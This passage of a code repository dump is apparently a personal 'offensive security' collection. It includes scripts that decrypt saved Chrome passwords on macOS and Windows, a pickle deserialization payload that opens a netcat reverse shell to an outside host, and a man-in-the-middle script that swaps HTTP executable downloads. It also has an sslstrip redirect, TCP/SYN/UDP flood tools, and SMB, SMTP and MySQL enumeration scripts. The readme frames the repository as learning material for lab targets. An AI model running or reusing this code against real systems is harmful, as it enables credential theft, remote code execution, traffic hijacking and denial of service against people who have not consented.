2. Get the decryption key from the keychain WITHOUT having to confirm the users password! 15 | 3. Use this key to decrypt the passwords. 16 | 4. Print out all of the passwords in a user friendly format. 17 | 18 | **Example usage:** 19 | 20 | ```python mac-chrome_passwords.py``` 21 | 22 | Then confirm keychain access by clicking "allow" 23 | 24 | ```text 25 | OUTPUT: 26 | [1] https://xxxxxxxx.yyyyyyy.zzzzzzz/login.php 27 | User: bobloblaw 28 | Pass: supersecretpassword 29 | 30 | [2] https://timcook.apple.com/apple-login 31 | User: tim 32 | Pass: cook1010101 33 | 34 | ``` 35 | -------------------------------------------------------------------------------- /post-connection/legacy/mac-chrome_passwords.py: -------------------------------------------------------------------------------- 1 | import sqlite3, os, binascii, subprocess, base64, sys, hashlib, glob 2 | 3 | loginData = glob.glob("%s/Library/Application Support/Google/Chrome/Profile*/Login Data" % os.path.expanduser("~")) 4 | if len(loginData) == 0: 5 | loginData = glob.glob("%s/Library/Application Support/Google/Chrome/Default/Login Data" % os.path.expanduser("~")) #attempt default profile 6 | safeStorageKey = subprocess.check_output("security 2>&1 > /dev/null find-generic-password -ga 'Chrome' | awk '{print $2}'", shell=True).replace("\n", "").replace("\"", "") 7 | if safeStorageKey == "": 8 | print "ERROR getting Chrome Safe Storage Key" 9 | sys.exit() 10 | 11 | def chromeDecrypt(encrypted_value, iv, key=None): #AES decryption using the PBKDF2 key and 16x ' ' IV, via openSSL (installed on OSX natively) 12 | hexKey = binascii.hexlify(key) 13 | hexEncPassword = base64.b64encode(encrypted_value[3:]) 14 | try: #send any error messages to /dev/null to prevent screen bloating up 15 | decrypted = subprocess.check_output("openssl enc -base64 -d -aes-128-cbc -iv '%s' -K %s <<< %s 2>/dev/null" % (iv, hexKey, hexEncPassword), shell=True) 16 | except Exception as e: 17 | decrypted = "ERROR retrieving password" 18 | return decrypted 19 | 20 | def chromeProcess(safeStorageKey, loginData): 21 | iv = ''.join(('20',) * 16) #salt, iterations, iv, size - https://cs.chromium.org/chromium/src/components/os_crypt/os_crypt_mac.mm 22 | key = hashlib.pbkdf2_hmac('sha1', safeStorageKey, b'saltysalt', 1003)[:16] 23 | fd = os.open(loginData, os.O_RDONLY) #open as read only 24 | database = sqlite3.connect('/dev/fd/%d' % fd) 25 | os.close(fd) 26 | sql = 'select username_value, password_value, origin_url from logins' 27 | decryptedList = [] 28 | with database: 29 | for user, encryptedPass, url in database.execute(sql): 30 | if user == "" or (encryptedPass[:3] != b'v10'): #user will be empty if they have selected "never" store password 31 | continue 32 | else: 33 | urlUserPassDecrypted = (url.encode('ascii', 'ignore'), user.encode('ascii', 'ignore'), chromeDecrypt(encryptedPass, iv, key=key).encode('ascii', 'ignore')) 34 | decryptedList.append(urlUserPassDecrypted) 35 | return decryptedList 36 | 37 | for profile in loginData: 38 | for i, x in enumerate(chromeProcess(safeStorageKey, "%s" % profile)): 39 | print "%s[%s]%s %s%s%s\n\t%sUser%s: %s\n\t%sPass%s: %s" % ("\033[32m", (i + 1), "\033[0m", "\033[1m", x[0], "\033[0m", "\033[32m", "\033[0m", x[1], "\033[32m", "\033[0m", x[2]) 40 | -------------------------------------------------------------------------------- /post-connection/mac_chrome_password.py: -------------------------------------------------------------------------------- 1 | import sqlite3, os, binascii, subprocess, base64, sys, hashlib, glob 2 | 3 | loginData = glob.glob(f"{os.path.expanduser('~')}/Library/Application Support/Google/Chrome/Profile*/Login Data") 4 | if len(loginData) == 0: 5 | loginData = glob.glob(f"{os.path.expanduser('~')}/Library/Application Support/Google/Chrome/Default/Login Data") #attempt default profile 6 | safeStorageKey = subprocess.check_output("security 2>&1 > /dev/null find-generic-password -ga 'Chrome' | awk '{print $2}'", shell=True).replace(b"\n", b"").replace(b"\"", b"") 7 | if safeStorageKey == b"": 8 | print("ERROR getting Chrome Safe Storage Key") 9 | sys.exit() 10 | 11 | def chromeDecrypt(encrypted_value, iv, key=None): #AES decryption using the PBKDF2 key and 16x ' ' IV, via openSSL (installed on OSX natively) 12 | hexKey = binascii.hexlify(key) 13 | hexEncPassword = base64.b64encode(encrypted_value[3:]) 14 | try: #send any error messages to /dev/null to prevent screen bloating up 15 | decrypted = subprocess.check_output(f"openssl enc -base64 -d -aes-128-cbc -iv '{iv}' -K {hexKey} <<< {hexEncPassword} 2>/dev/null", shell=True) 16 | except Exception as e: 17 | decrypted = b"ERROR retrieving password" 18 | return decrypted 19 | 20 | def chromeProcess(safeStorageKey, loginData): 21 | iv = ''.join(('20',) * 16) #salt, iterations, iv, size - https://cs.chromium.org/chromium/src/components/os_crypt/os_crypt_mac.mm 22 | key = hashlib.pbkdf2_hmac('sha1', safeStorageKey, b'saltysalt', 1003)[:16] 23 | fd = os.open(loginData, os.O_RDONLY) #open as read only 24 | database = sqlite3.connect(f'/dev/fd/{fd}') 25 | os.close(fd) 26 | sql = 'select username_value, password_value, origin_url from logins' 27 | decryptedList = [] 28 | with database: 29 | for user, encryptedPass, url in database.execute(sql): 30 | if user == "" or (encryptedPass[:3] != b'v10'): #user will be empty if they have selected "never" store password 31 | continue 32 | else: 33 | urlUserPassDecrypted = (url.encode('ascii', 'ignore'), user.encode('ascii', 'ignore'), chromeDecrypt(encryptedPass, iv, key=key).decode('ascii', 'ignore')) 34 | #urlUserPassDecrypted = (url.encode('ascii', 'ignore'), user.encode('ascii', 'ignore'), chromeDecrypt(encryptedPass, iv, key=key).encode('ascii', 'ignore')) 35 | decryptedList.append(urlUserPassDecrypted) 36 | return decryptedList 37 | 38 | for profile in loginData: 39 | for i, x in enumerate(chromeProcess(safeStorageKey, f"{profile}")): 40 | print(f"\033[32m[{i+1}]\033[0m \033[1m{x[0]}\033[0m\n\t\033[32mUser\033[0m: {x[1]}\n\t\033[32mPass\033[0m: {x[2]}") 41 | -------------------------------------------------------------------------------- /post-connection/win-chrome_passwords.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sqlite3 3 | import win32crypt 4 | import sys 5 | 6 | try: 7 | path = sys.argv[1] 8 | except IndexError: 9 | for w in os.walk(os.getenv('USERPROFILE')): 10 | if 'Chrome' in w[1]: 11 | path = str(w[0]) + r'\Chrome\User Data\Default\Login Data' 12 | 13 | # Connect to the Database 14 | try: 15 | print('[+] Opening ' + path) 16 | conn = sqlite3.connect(path) 17 | cursor = conn.cursor() 18 | except Exception as e: 19 | print('[-] %s' % (e)) 20 | sys.exit(1) 21 | 22 | # Get the results 23 | try: 24 | cursor.execute('SELECT action_url, username_value, password_value FROM logins') 25 | except Exception as e: 26 | print('[-] %s' % (e)) 27 | sys.exit(1) 28 | 29 | data = cursor.fetchall() 30 | 31 | if len(data) > 0: 32 | for result in data: 33 | # Decrypt the Password 34 | try: 35 | password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] 36 | except Exception as e: 37 | print('[-] %s' % (e)) 38 | pass 39 | if password: 40 | print('''[+] URL: %s 41 | Username: %s 42 | Password: %s''' %(result[0], result[1], password)) 43 | else: 44 | print('[-] No results returned from query') 45 | sys.exit(0) -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | # Offensive Security Python 2 | > Offensive Security Python. Collection of python scripts that I created/pirated/curated to help me understand CyberSecurity. I find it helpful to write the tools you use to help you really understand what it does and what's the purpose of it. 3 | > "When you try to understand everything, you stumble on a few things along the way" 4 | > "Code is the best place to capture current understanding of a model" 5 | 6 | **Topics** 7 | - Changing MAC Address 8 | - Network Scanner 9 | - ARP Spoofing 10 | - Packet Sniffer 11 | - DNS Spoofer 12 | - Replace Download 13 | - XSS Scanner 14 | - Network Scanner 15 | - Utilities 16 | - Fake Profile Generator 17 | - Randomize MAC Address 18 | - Combine Wordlist 19 | 20 | ## Targets 21 | 22 | 1. DVWA 23 | ``` 24 | docker run --rm -it -p 80:80 vulnerables/web-dvwa:latest 25 | ``` 26 | 2. metasploitable2 27 | ``` 28 | docker run --name container-name -it tleemcjr/metasploitable2:latest sh -c "/bin/services.sh && bash" 29 | ``` 30 | 31 | ## Playbook 32 | > Check on how to use these tools 33 | 34 | ## Dependencies on PIP 35 | - scapy 36 | - scapy_http 37 | - netfilterqueue 38 | - netifaces 39 | 40 | ## Changing the MAC Address 41 | 42 | This tool will change your current MAC address. 43 | MAC Address is auto generated randomly. Just Specify the the interface. 44 | 45 | ```bash 46 | python mac_changer.py -i # template 47 | python mac_changer.py -i wlan0 # usage 48 | ``` 49 | > You can Manually add the mac address by doin -m 50 | > -h for more info 51 | 52 | ## Network Scanner 53 | 54 | This tool will ping all the connected device inside the network/router. 55 | 56 | ```bash 57 | python network_scanner.py -t # Template 58 | python network_scanner.py -t 192.168.1.1/24 # Usage 59 | ``` 60 | 61 | ## ARP Spoofing 62 | 63 | This tools makes you the man in the middle. 64 | Tricks the gateway and the target IP to send you the data. 65 | Poisoning the ARP. 66 | 67 | ```bash 68 | python arp_spoof.py -t -g # Template 69 | python arp_spoof.py -t 192.168.1.2 -g 192.168.1.1 # Usage 70 | ``` 71 | 72 | --- 73 | 74 | ### Python 3 Compatibility 75 | 76 | pip3 install scapy-python3 77 | 78 | #### Same line Printing 79 | print("\r [+] Info counter", end="") 80 | 81 | 82 | ## Network Interfaces 83 | 84 | | Network Interface | Description | 85 | |-------------------|----------------------------------------------------------------| 86 | | eth0 | Default network interface on Linux systems | 87 | | wlan0 | Wireless network interface on Linux systems | 88 | | en0 | Default network interface on macOS systems | 89 | | en1 | Wireless network interface on macOS systems | 90 | | Ethernet | Default network interface on Windows systems (older versions) | 91 | | Wi-Fi | Wireless network interface on Windows systems (older versions) | 92 | | Ethernet0 | Default network interface on Windows systems (newer versions) | 93 | | Wi-Fi0 | Wireless network interface on Windows systems (newer versions) | 94 | -------------------------------------------------------------------------------- /recon/local_network_scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | from scapy.all import * 5 | 6 | interface = "en0" 7 | ip_range = "192.168.254.1/24" 8 | broadcastMac = "ff:ff:ff:ff:ff:ff" 9 | 10 | packet = Ether(dst=broadcastMac)/ARP(pdst = ip_range) 11 | 12 | ans, unans = srp(packet, timeout =2, iface=interface, inter=0.1) 13 | 14 | for send,receive in ans: 15 | print (receive.sprintf(r"%Ether.src% - %ARP.psrc%")) 16 | -------------------------------------------------------------------------------- /recon/mysql_enum.py: -------------------------------------------------------------------------------- 1 | import mysql.connector 2 | 3 | class MySQLDatabase: 4 | def __init__(self, host='localhost', port=3306, user='root', password='password', database='mysql'): 5 | self.host = host 6 | self.port = port 7 | self.user = user 8 | self.password = password 9 | self.database = database 10 | self.connection = None 11 | self.databases = [] 12 | 13 | def connect(self): 14 | try: 15 | self.connection = mysql.connector.connect( 16 | host=self.host, 17 | port=self.port, 18 | user=self.user, 19 | password=self.password, 20 | database=self.database 21 | ) 22 | print("Connected to MySQL database.") 23 | except mysql.connector.Error as error: 24 | print("Failed to connect to MySQL database:", error) 25 | 26 | def get_databases(self): 27 | if self.connection.is_connected(): 28 | cursor = self.connection.cursor() 29 | cursor.execute("SHOW DATABASES") 30 | self.databases = [database[0] for database in cursor] 31 | cursor.close() 32 | return self.databases 33 | else: 34 | print("Not connected to MySQL database.") 35 | return [] 36 | 37 | def get_tables(self): 38 | tables = {} 39 | if self.connection.is_connected(): 40 | for database in self.databases: 41 | cursor = self.connection.cursor() 42 | cursor.execute(f"SHOW TABLES FROM `{database}`") 43 | tables[database] = [table[0] for table in cursor] 44 | cursor.close() 45 | else: 46 | print("Not connected to MySQL database.") 47 | return tables 48 | 49 | 50 | def main(): 51 | # host = 'localhost' 52 | host = '10.10.68.240' 53 | port = 3306 54 | user = 'root' 55 | password = 'password' 56 | database = 'mysql' 57 | 58 | db = MySQLDatabase(host, port, user, password, database) 59 | db.connect() 60 | 61 | 62 | databases = db.get_databases() 63 | print(f"[+] Total Databases: {len(databases)}") 64 | print("Databases:", databases) 65 | 66 | tables = db.get_tables() 67 | for database, table_list in tables.items(): 68 | print(f"[+] Datase: {database}") 69 | print(f"[+] Total Tables in {database}: {len(table_list)}") 70 | print(table_list) 71 | print("-"*80,"\n") 72 | 73 | db.connection.close() 74 | print("Connection closed.") 75 | 76 | if __name__ == '__main__': 77 | main() 78 | -------------------------------------------------------------------------------- /recon/smb-check-access.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from smb.SMBConnection import SMBConnection 3 | from smb.smb_structs import OperationFailure 4 | 5 | """ 6 | # TESTED: 7 | Python 3.10.6 8 | pip3 install pysmb 9 | 10 | 11 | # USAGE: 12 | ╰─$ python3 smb-check-access.py 10.10.10.10 13 | [+] Share List 14 | netlogon 15 | profiles 16 | print$ 17 | IPC$ 18 | 19 | [-] Access denied on share 10.10.97.132/netlogon -u Anonymous 20 | [+] Access allowed on share 10.10.97.132/profiles -u Anonymous ! 21 | [-] Access denied on share 10.10.97.132/print$ -u Anonymous 22 | [-] Access denied on share 10.10.97.132/IPC$ -u Anonymous 23 | """ 24 | 25 | 26 | class SMBEnum: 27 | def __init__(self, remote_ip): 28 | self.remote_name = '' 29 | self.remote_ip = remote_ip 30 | self.my_name = '' 31 | self.username = 'Anonymous' 32 | self.password = '' 33 | 34 | def connect(self): 35 | self.conn = SMBConnection(self.username, self.password, self.my_name, self.remote_name, use_ntlm_v2 = True) 36 | return self.conn.connect(self.remote_ip, 139) 37 | 38 | def get_share_list(self): 39 | shares = self.conn.listShares() 40 | print("[+] Share List") 41 | for share in shares: 42 | print(share.name) 43 | print() 44 | 45 | def test_anonymous_access(self): 46 | shares = self.conn.listShares() 47 | for share in shares: 48 | self.conn = SMBConnection(self.username, self.password, self.my_name, self.remote_name, use_ntlm_v2 = True) 49 | self.conn.connect(self.remote_ip, 139) 50 | try: 51 | # Attempt to list files in share 52 | file_list = self.conn.listPath(share.name, '/') 53 | print(f"[+] Access allowed on share {self.remote_ip}/{share.name} -u {self.username} !") 54 | except OperationFailure: 55 | print(f"[-] Access denied on share {self.remote_ip}/{share.name} -u {self.username}") 56 | 57 | if __name__ == "__main__": 58 | if len(sys.argv) != 2: 59 | print("Usage: python3 smb-check-access.py ") 60 | sys.exit(1) 61 | remote_ip = sys.argv[1] 62 | smb_enum = SMBEnum(remote_ip) 63 | if smb_enum.connect(): 64 | smb_enum.get_share_list() 65 | smb_enum.test_anonymous_access() 66 | else: 67 | print("Connection failed.") 68 | -------------------------------------------------------------------------------- /recon/smtp_enum.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import smtplib 3 | 4 | """ 5 | version_tested: python 3.10.6 6 | 7 | in main(): 8 | change 9 | rhosts = 10 | username_list = 11 | 12 | 13 | # USAGE 14 | 15 | ╰─$ python3 smtp_enum-3.py 16 | [+] target_ip = 10.10.129.130 17 | [+] wordlist = username_list 18 | [+] Banner: 220 polosmtp.home ESMTP Postfix (Ubuntu) 19 | 20 | [+] User found: root 21 | [+] User found: administrator 22 | [+] User found: vagrant 23 | 24 | """ 25 | 26 | class SmtpScanner: 27 | def __init__(self, ip, port=25): 28 | self.ip = ip 29 | self.port = port 30 | self.smtp = None 31 | 32 | def connect(self): 33 | try: 34 | self.smtp = smtplib.SMTP(self.ip, self.port) 35 | return True 36 | except Exception as e: 37 | print(f"Could not connect: {e}") 38 | return False 39 | 40 | def get_banner(self): 41 | try: 42 | with socket.create_connection((self.ip, self.port), timeout=10) as sock: 43 | banner = sock.recv(1024).decode() 44 | return banner 45 | except Exception as e: 46 | print(f"Could not connect: {e}") 47 | return None 48 | 49 | def enumerate_users(self, user_file): 50 | if self.smtp is None: 51 | print("No connection.") 52 | return None 53 | 54 | users = [] 55 | with open(user_file, 'r') as f: 56 | for line in f: 57 | username = line.strip() 58 | try: 59 | code, msg = self.smtp.docmd("vrfy", username) 60 | if code == 250 or code == 252: 61 | print(f"[+] User found: {username}") 62 | users.append(username) 63 | except Exception as e: 64 | print(f"[+] Error verifying user {username}: {e}") 65 | return users 66 | 67 | 68 | def main(): 69 | rhosts = '10.10.129.130' 70 | username_list = '/usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt' 71 | print( 72 | f"[+] target_ip = {rhosts}", 73 | f"\n[+] wordlist = username_list" 74 | ) 75 | enumerator = SmtpScanner(rhosts) 76 | if enumerator.connect(): 77 | print("[+] Banner: ", enumerator.get_banner()) 78 | enumerator.enumerate_users(username_list) 79 | else: 80 | print("[-] Could not connect to the SMTP server.") 81 | 82 | if __name__ == "__main__": 83 | main() 84 | -------------------------------------------------------------------------------- /replace_download.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import netfilterqueue 3 | import subprocess 4 | import scapy.all as scapy 5 | 6 | ack_list = [] 7 | def set_load(packet, load): 8 | packet[scapy.Raw].load = load 9 | del packet[scapy.IP].len 10 | del packet[scapy.IP].chksum 11 | del packet[scapy.TCP].chksum 12 | return packet 13 | 14 | def proccess_packet(packet): 15 | scapy_packet = scapy.IP(packet.get_payload()) 16 | if scapy_packet.haslayer(scapy.Raw): 17 | if scapy_packet[scapy.TCP].dport == 80: 18 | print("\n[+] HTTP Request") 19 | if ".exe" in scapy_packet[scapy.Raw].load: 20 | print("[+] Exe Request") 21 | ack_list.append(scapy_packet[scapy.TCP].ack) 22 | print(scapy_packet.show()) 23 | 24 | elif scapy_packet[scapy.TCP].sport == 80: 25 | if scapy_packet[scapy.TCP].seq in ack_list: 26 | ack_list.remove(scapy_packet[scapy.TCP].seq) 27 | print("[+] Replacing File") 28 | modified_packet = set_load( scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: https://www.rarlab.com/rar/winrar-x64-59b3.exe\n\n") 29 | 30 | packet.set_payload(str(modified_packet)) 31 | 32 | packet.accept() 33 | 34 | # For local Testing 35 | subprocess.call("iptables -I OUTPUT -j NFQUEUE --queue-num 0", shell=True) 36 | subprocess.call("iptables -I INPUT -j NFQUEUE --queue-num 0", shell=True) 37 | 38 | # For Forwarding remote network 39 | # subprocess.call("iptables -I FORWARD -j NFQUEUE --queue-num 0", shell=True) 40 | 41 | try: 42 | while True: 43 | queue = netfilterqueue.NetfilterQueue() 44 | queue.bind(0, proccess_packet) 45 | queue.run() 46 | except KeyboardInterrupt: 47 | subprocess.call("iptables --flush", shell=True) 48 | print("\nStopped.. IP Tables Flushed") -------------------------------------------------------------------------------- /reset.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | echo "Resetting IP tables ..." 4 | iptables --flush -------------------------------------------------------------------------------- /reverse-shells/pickle-rev-base64.py: -------------------------------------------------------------------------------- 1 | import pickle 2 | import sys 3 | import base64 4 | """ 5 | Insecure Deserialization - Code Execution 6 | base64 RCE command 7 | 8 | Use this when a python server is executing an encoded payloaded make sure to have a netcat listener ready 9 | nc -lvnp 4444 10 | 11 | change your IP 12 | """ 13 | command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat 10.10.10.10 4444 > /tmp/f' 14 | 15 | class rce(object): 16 | def __reduce__(self): 17 | import os 18 | return (os.system,(command,)) 19 | 20 | print(base64.b64encode(pickle.dumps(rce()))) 21 | -------------------------------------------------------------------------------- /scapy.md: -------------------------------------------------------------------------------- 1 | # Scapy 101 Cheat Sheet 2 | > import scapy.all as scapy 3 | 4 | packet 5 | > Data from the network 6 | 7 | scapy.IP(packet) 8 | > To use the packet from the scapy object 9 | 10 | 11 | scapy.ls() 12 | > To show field list of functions 13 | 14 | scapy.ARP() 15 | 16 | exammple: 17 | 18 | scapy.ls(scapy.ARP()) 19 | ``` 20 | hwtype : XShortField = 1 (1) 21 | ptype : XShortEnumField = 2048 (2048) 22 | hwlen : FieldLenField = None (None) 23 | plen : FieldLenField = None (None) 24 | op : ShortEnumField = 1 (1) 25 | hwsrc : MultipleTypeField = '88:e9:fe:76:6d:0a' (None) 26 | psrc : MultipleTypeField = '192.168.254.107' (None) 27 | hwdst : MultipleTypeField = '00:00:00:00:00:00' (None) 28 | pdst : MultipleTypeField = '0.0.0.0' (None) 29 | ``` 30 | scapy.show() 31 | 32 | Scapy Layers 33 | - IP 34 | - TCP 35 | - UDP 36 | - Raw -------------------------------------------------------------------------------- /sslstrip_proxy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo "Make sure you already run sslstrip ..." 3 | echo "Redirecting all web request to SSL Strip Proxy Port" 4 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 -------------------------------------------------------------------------------- /stress_testing/readme.md: -------------------------------------------------------------------------------- 1 | # Stress Tesing 2 | 3 | ## USAGE 4 | 5 | ``` 6 | sudo python3 file IP PORT 7 | ``` 8 | 9 | ## Monitor Traffic 10 | > To monitor the traffic that is being sent to machine 11 | 12 | TCP SYN packets sent to your machine 13 | ``` 14 | sudo tcpdump 'tcp[tcpflags] & tcp-syn != 0' 15 | ``` 16 | 17 | if you want to save the captured packets to a file, you can use the -w option followed by a filename: 18 | ``` 19 | sudo tcpdump -w output.pcap 'tcp[tcpflags] & tcp-syn != 0' 20 | ``` 21 | 22 | This will save the captured packets to a file called output.pcap. You can then use a tool like Wireshark to analyze the captured packets in more detail. 23 | 24 | 25 | 26 | To capture UDP packets, you can use a similar command but filter for UDP packets instead: 27 | ``` 28 | sudo tcpdump 'udp' 29 | ``` -------------------------------------------------------------------------------- /stress_testing/tcp_flood.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import sys 3 | 4 | def main(target_ip, target_port, rounds=10_000): 5 | print(f"Target IP: {target_ip}") 6 | print(f"Target Port: {target_port}") 7 | print(f"Rounds: {rounds}") 8 | # Define the payload to send in the packets 9 | payload = "A" * 1024 10 | 11 | # Create a loop to send a large number of packets to the target 12 | for i in range(rounds): 13 | packet = IP(dst=target_ip)/TCP(dport=target_port)/payload 14 | send(packet, verbose=False) 15 | 16 | if __name__ == "__main__": 17 | target_ip = sys.argv[1] 18 | target_port = sys.argv[2] 19 | main(target_ip=target_ip, target_port=target_port) 20 | 21 | 22 | 23 | """ 24 | most common port to test are 25 | 53 26 | 80 27 | 443 28 | """ -------------------------------------------------------------------------------- /stress_testing/tcp_syn_flood.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import sys 3 | 4 | def main(target_ip, target_port, rounds=10_000): 5 | print(f"Target IP: {target_ip}") 6 | print(f"Target Port: {target_port}") 7 | print(f"Rounds: {rounds}") 8 | 9 | # Define the payload to send in the packets 10 | payload = "A" * 1024 11 | 12 | # Create a loop to send a large number of packets to the target 13 | for i in range(rounds): 14 | packet = IP(dst=target_ip) / TCP(dport=target_port, flags="S") / payload 15 | send(packet, verbose=False) 16 | 17 | if __name__ == "__main__": 18 | target_ip = sys.argv[1] 19 | target_port = int(sys.argv[2]) 20 | main(target_ip=target_ip, target_port=target_port) 21 | -------------------------------------------------------------------------------- /stress_testing/udp_flood.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import random 3 | 4 | # Define the target IP and port 5 | target_ip = "192.168.0.1" 6 | target_port = 80 7 | 8 | # Define a function to send UDP packets 9 | def send_packet(): 10 | # Generate a random source port number 11 | src_port = random.randint(1024, 65535) 12 | 13 | # Create a UDP packet with random source and destination port numbers 14 | packet = IP(dst=target_ip)/UDP(sport=src_port, dport=target_port)/Raw(load="X"*1024) 15 | 16 | # Send the packet 17 | send(packet, verbose=0) 18 | 19 | # Send the UDP packets in a loop 20 | while True: 21 | send_packet() 22 | 23 | """ 24 | most common port to test are 25 | 53 26 | 80 27 | 443 28 | """ -------------------------------------------------------------------------------- /util/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xj4f/offensivesecurity-python/9da1271cc0e04de44b3535e19221d2a23306de13/util/__init__.py -------------------------------------------------------------------------------- /util/combine_wordlist.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | def combine_wordlists(w1, w2, output): 4 | with open(w1, 'r') as f1: 5 | words = set([w.strip() for w in f1.readlines()]) 6 | 7 | with open(w2, 'r') as f2: 8 | words.update(set([w.strip() for w in f2.readlines()])) 9 | 10 | with open(output, 'w') as out_file: 11 | for word in sorted(words): 12 | out_file.write(word + '\n') 13 | 14 | if __name__ == '__main__': 15 | parser = argparse.ArgumentParser(description='Combine two wordlists and write to a new file.') 16 | parser.add_argument('-w1', '--wordlist1', required=True, help='First wordlist file.') 17 | parser.add_argument('-w2', '--wordlist2', required=True, help='Second wordlist file.') 18 | parser.add_argument('-o', '--output', required=True, help='Output file name.') 19 | args = parser.parse_args() 20 | 21 | combine_wordlists(args.wordlist1, args.wordlist2, args.output) 22 | -------------------------------------------------------------------------------- /util/fakeprofile-generator.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | from faker import Faker 3 | 4 | def generate_profiles(number=20): 5 | # Create object 6 | fake = Faker() 7 | 8 | # Generate data 9 | # fake_name = fake.name() 10 | # fake_text = fake.text() 11 | # fake_address = fake.address() 12 | # fake_email = fake.email() 13 | # fake_date = fake.date() 14 | # fake_country = fake.country() 15 | # fake_phone_number = fake.phone_number() 16 | # fake_random_number = fake.random_number(digits=number) 17 | number=number 18 | # Dataframe creation 19 | fakeDataframe = pd.DataFrame({'date': [fake.date() for i in range(number)], 20 | 'name': [fake.name() for i in range(number)], 21 | 'email': [fake.email() for i in range(number)], 22 | 'number': [ fake.phone_number() for i in range(number) ], 23 | 'text': [fake.text() for i in range(number)]}) 24 | return fakeDataframe 25 | 26 | if __name__ == '__main__': 27 | fakeDataframe = generate_profiles() 28 | print(fakeDataframe) 29 | -------------------------------------------------------------------------------- /util/mac_network_interfaces.py: -------------------------------------------------------------------------------- 1 | import psutil 2 | import socket 3 | """ 4 | pip install psutil 5 | python3.11 6 | """ 7 | 8 | def get_ipv4_addresses(): 9 | addrs = {} 10 | for interface, addresses in psutil.net_if_addrs().items(): 11 | for addr in addresses: 12 | if addr.family == socket.AF_INET: 13 | addrs[interface] = addr.address 14 | return addrs 15 | 16 | """ 17 | get_ipv4_addresses() 18 | {'lo0': '127.0.0.1', 'en0': '192.168.100.27'} 19 | """ 20 | 21 | if __name__ == '__main__': 22 | print(get_ipv4_addresses()) 23 | -------------------------------------------------------------------------------- /util/network_interfaces.py: -------------------------------------------------------------------------------- 1 | import netifaces 2 | 3 | def get_interfaces_with_ipv4(): 4 | """ 5 | Returns a dictionary containing the names and IPv4 addresses of all the network interfaces. 6 | """ 7 | interfaces = {} 8 | for iface in netifaces.interfaces(): 9 | addrs = netifaces.ifaddresses(iface) 10 | if netifaces.AF_INET in addrs: 11 | ipv4_addr = addrs[netifaces.AF_INET][0]['addr'] 12 | interfaces[iface] = ipv4_addr 13 | return interfaces 14 | """ 15 | Tested on Ubuntu 16 | >>> get_interfaces_with_ipv4() 17 | {'lo': '127.0.0.1', 'eth0': '111.111.1111.111', 'eth1': '10.104.0.2', 'docker0': '172.17.0.1', 'br-a5fec66624dd': '172.24.0.1', 'br-2b3ebff17e3b': '192.168.16.1', 'br-6539607c7ed5': '172.21.0.1'} 18 | """ 19 | 20 | 21 | 22 | # import socket 23 | 24 | # def get_ipv4_addresses(): 25 | # ip_addresses = [] 26 | # for interface in socket.if_nameindex(): 27 | # interface_name = interface[1] 28 | # addresses = socket.getaddrinfo(interface_name, None) 29 | # for address in addresses: 30 | # if address[0] == socket.AF_INET: 31 | # ip_address = address[4][0] 32 | # ip_addresses.append((interface_name, ip_address)) 33 | # return ip_addresses 34 | 35 | # if __name__ == '__main__': 36 | # print(get_ipv4_addresses()) 37 | 38 | 39 | # import socket 40 | 41 | # def get_ipv4_addresses(interface_name): 42 | # # Get all address info for the specified interface name 43 | # addresses = socket.getaddrinfo(interface_name, None) 44 | 45 | # # Filter for IPv4 addresses only 46 | # ipv4_addresses = [addr[4][0] for addr in addresses if addr[0] == socket.AF_INET] 47 | 48 | # return ipv4_addresses 49 | 50 | # # Example usage 51 | # print(get_ipv4_addresses('en0')) 52 | 53 | # import subprocess 54 | # import re 55 | 56 | # def get_ipv4_addresses(): 57 | # # Get the output of the ifconfig command 58 | # output = subprocess.check_output(['ifconfig']) 59 | # print(output) 60 | # # Use regular expressions to find the interface names and IPv4 addresses 61 | # pattern = r'(\w+):.*?inet (\d+\.\d+\.\d+\.\d+)' 62 | # matches = re.findall(pattern, output, flags=re.DOTALL) 63 | 64 | # # Create a dictionary of interface names and their IPv4 addresses 65 | # ipv4_addresses = {} 66 | # for match in matches: 67 | # ipv4_addresses[match[0]] = match[1] 68 | 69 | # return ipv4_addresses 70 | 71 | # import socket 72 | # hostname=socket.gethostname() 73 | # IPAddr=socket.gethostbyname(hostname) 74 | # print("Your Computer Name is:"+hostname) 75 | # print("Your Computer IP Address is:"+IPAddr) 76 | 77 | import socket 78 | 79 | import fcntl 80 | import struct 81 | 82 | def get_ipv4_addresses(): 83 | addresses = [] 84 | for interface in socket.if_nameindex(): 85 | try: 86 | socket_fd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 87 | ip_address = socket.inet_ntoa(fcntl.ioctl(socket_fd.fileno(), 0x8915, struct.pack('256s', interface[1].encode()))[20:24]) 88 | addresses.append((interface[1], ip_address)) 89 | except IOError: 90 | pass 91 | return addresses 92 | 93 | 94 | # def get_ipv4_addresses(): 95 | # ip_list = [] 96 | # for interface in socket.if_nameindex(): 97 | # if interface[1].startswith('lo'): # skip loopback interface 98 | # continue 99 | # addresses = socket.getaddrinfo(interface[1], None) 100 | # for address in addresses: 101 | # ip = address[4][0] 102 | # if '.' in ip: # check if IPv4 address 103 | # ip_list.append((interface[1], ip)) 104 | # return ip_list 105 | 106 | if __name__ == '__main__': 107 | print(get_ipv4_addresses()) 108 | -------------------------------------------------------------------------------- /util/randomize_mac.py: -------------------------------------------------------------------------------- 1 | import string 2 | import random 3 | 4 | characters = 'abcdef' + string.digits 5 | 6 | def randomize(char): 7 | return 